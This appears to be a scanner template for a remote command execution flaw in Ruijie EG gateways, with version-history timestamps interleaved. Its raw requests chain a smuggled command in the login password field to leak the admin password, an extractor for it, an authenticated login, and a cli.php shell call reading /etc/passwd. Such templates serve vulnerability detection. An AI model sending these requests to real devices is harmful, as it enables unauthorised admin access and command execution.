2021-08-06 10:04:32 +00:00
id : ruijie-eg-rce
info :
name : Ruijie EG cli.php RCE
author : pikpikcu
severity : critical
2021-10-25 06:56:44 +00:00
description : A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
2021-08-19 14:00:46 +00:00
reference :
2021-10-25 06:57:47 +00:00
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
2021-08-19 14:00:46 +00:00
- https://www.ruijienetworks.com
2021-08-06 10:04:32 +00:00
tags : ruijie,rce
requests :
- raw :
2021-08-06 18:00:34 +00:00
- |
POST /login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username=admin&password=admin?show+webmaster+user
- |
POST /login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username=admin&password={{admin}}
2021-08-06 10:04:32 +00:00
- |
POST /cli.php?a=shell HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded;charset=UTF-8
notdelay=true&command=cat /etc/passwd
2021-08-06 18:00:34 +00:00
cookie-reuse : true
2021-08-06 10:04:32 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0"
2021-08-06 18:00:34 +00:00
- "nobody:.*:0:0"
2021-08-06 10:04:32 +00:00
part : body
- type : status
status :
- 200
2021-08-06 18:00:34 +00:00
extractors :
- type : regex
name : admin
group : 1
internal : true
regex :
- 'admin ([a-zA-Z0-9#@]+)",'